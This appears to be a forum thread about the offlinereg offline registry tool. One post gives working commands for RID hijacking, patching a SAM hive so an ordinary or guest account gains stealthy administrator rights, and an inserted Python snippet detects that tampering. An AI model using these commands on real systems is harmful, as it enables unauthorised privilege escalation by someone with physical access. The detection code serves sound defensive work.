offlinereg


281 replies to this topic

#276 osfixer

osfixer

    Member

  • Members
  • 31 posts
    United Kingdom

Posted a week ago

You forgot to fix this one. Leftovers. 
Edit: It seems to work fine. 

 

Also reg.exe cannot be a replacement because it doesn't ignore permissions. 


Edited by osfixer, 6 days ago.


#277 osfixer

osfixer

    Member

  • Members
  • 31 posts
    United Kingdom

Posted 5 days ago

What you could do also is add support for adjusting permissions.. for keys, values. 

This could be done only through command line I think. 

 

Does offlinereg respect inherited user? If process is launched with SYSTEM or TI token?

If it doesn't you can add /inherit switch..

DWORD
ORAPI
ORGetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_Out_opt_ PSECURITY_DESCRIPTOR pSecurityDescriptor,
_Inout_ PDWORD lpcbSecurityDescriptor
);

DWORD
ORAPI
ORSetKeySecurity (
_In_ ORHKEY Handle,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ PSECURITY_DESCRIPTOR pSecurityDescriptor
);

Edited by osfixer, 4 days ago.


#278 erwan.l

erwan.l

    Gold Member

  • Developer
  • 2471 posts
  • Location:Nantes - France
    France

Posted 48 minutes ago

Following a post here on how to blank an account's password using offlinereg, this time, let's see how to perform RID hijacking.

The local admin account has a 01F4 rid.
What about "patching" another account to replace its RID with 01F4?

rem notice the rid at offset 30h (here E803)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 getvalue f

rem lets write f401 (admin rid) at offset 30h (48 in decimal form)
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 244 48
OfflineReg-win32 "c:\windows\system32\config\SAM" sam\domains\account\users\000003e8 setvaluebyteat f 1 49

Now you should be able to restart your system, log in with this user account and actually perform admin tasks.
This is quite "stealthy" as the account will still not be part of the local admin group while being able to perform admin tasks.

LSASS trusts SAMSRV and SAMSRV trusts the registry.

This can work with the guest account as well.

I tested this with success from a winpe against windows 10.
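From a defender's side, the patch described above leaves a detectable inconsistency: the RID stored in the F value no longer matches the name of the user subkey it lives under. The following is an added example (not code from the thread or from offlinereg) that checks for that mismatch; it assumes only what the post states, namely a little-endian RID at offset 0x30 of the F value, and the hex subkey names under SAM\Domains\Account\Users. The F bytes here are constructed; in practice you would feed it the bytes read with OfflineReg getvalue or an offline hive parser.

```python
import struct

# Offset of the RID field inside the "F" value of a SAM user key
# (the post above patches bytes 48 and 49, i.e. 0x30 and 0x31).
RID_OFFSET = 0x30
ADMIN_RID = 0x1F4  # 500, the built-in Administrator


def build_f_value(rid: int, length: int = 0x50) -> bytes:
    """Constructed F value: zeros except the little-endian RID at 0x30.
    A real F value also carries timestamps and flags; irrelevant here."""
    if length < RID_OFFSET + 4:
        raise ValueError("F value too short to hold a RID field")
    buf = bytearray(length)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


def stored_rid(f_value: bytes) -> int:
    """Read the RID the F value claims for this account."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to contain a RID field")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def check_user_key(key_name: str, f_value: bytes) -> dict:
    """key_name is the hex subkey under SAM\\Domains\\Account\\Users,
    e.g. '000003E8'. The key name is the RID Windows assigned; the F
    value is what SAMSRV will hand to LSASS. They must agree."""
    expected = int(key_name, 16)
    actual = stored_rid(f_value)
    return {
        "key": key_name.upper(),
        "expected_rid": expected,
        "stored_rid": actual,
        "hijacked": expected != actual,
        "impersonates_admin": expected != actual and actual == ADMIN_RID,
    }


def scan_users(users: dict) -> list:
    """users maps subkey name -> F value bytes; returns the suspicious ones."""
    return [r for r in (check_user_key(k, v) for k, v in users.items())
            if r["hijacked"]]


# Constructed sample hive content: RID 1000 is clean, RID 1001 was patched
# to carry the Administrator RID 0x1F4 exactly as the post describes.
SAMPLE_USERS = {
    "000001F4": build_f_value(0x1F4),
    "000003E8": build_f_value(0x3E8),
    "000003E9": build_f_value(0x1F4),
}
```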



#279 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14615 posts
  • Location:The Outside of the Asylum (gate is closed)
    Italy

Posted 26 minutes ago

This can work with the guest account as well.


Nice :)

And once again, all that can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, sooner or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it



#280 erwan.l

erwan.l

    Gold Member

  • Developer
  • 2471 posts
  • Location:Nantes - France
    France

Posted 16 minutes ago

Nice :)

And once again, all that can be used to prevent a hypothetical intruder (with limited physical access[1]) from pwning your system is only the BIOS password (and possibly disk encryption, please read as "the surest way to lose all your data, sooner or later").

:duff:
Wonko

 

[1] i.e. sitting in front of your PC but not having the time/opportunity to disassemble it

 

Absolutely agree.

 

BIOS is a bit extreme in a corporate environment as you cannot ask users to remember/type the BIOS password, but it is perfectly valid in a home environment.

 

Disk encryption like BitLocker addresses a lot of these "local" attacks, although I feel BitLocker could shortly be broken without even having to get the key from the TPM chip...



#281 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 14615 posts
  • Location:The Outside of the Asylum (gate is closed)
    Italy

Posted 9 minutes ago

BIOS is a bit extreme in a corporate environment as you cannot ask users to remember/type this password, but it is perfectly valid in a home environment.

 

I don't see how you can ask a user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.



#282 erwan.l

erwan.l

    Gold Member

  • Developer
  • 2471 posts
  • Location:Nantes - France
    France

Posted a minute ago

I don't see how you can ask a user to remember his Windows login password[1] but not the BIOS one in a corporate environment.

 

:duff:

Wonko

 

[1] and usually another 3 to 15 passwords[2] to different corporate accounts/services

[2] which are the actual use - besides the Windows login password - for the post-it in the top left drawer of the (corporate) desk.

 

I work in a big corp environment and it is already a PITA to enforce usernames which are vaguely connected to the actual user name (2 letters for country code, 1 letter for division, 2 letters for first name, 2 letters for last name) and then an 8+ character password which has to include digits AND non-alphanumeric chars.

 

That alone is enough to keep dozens of IT ppl busy every day :)

I can see the massive nervous breakdown it would be if we were to ask to remember the computer BIOS password.

 

Now, on the good side, in big corp environments SSO makes it so that the user normally should only have to remember his unique LDAP credentials, with one major pitfall though: if the user credentials get compromised, all apps get compromised...

 

Security is a never ending discussion.

I like to play the red team sec guy. I really would not want to be a blue team sec guy :)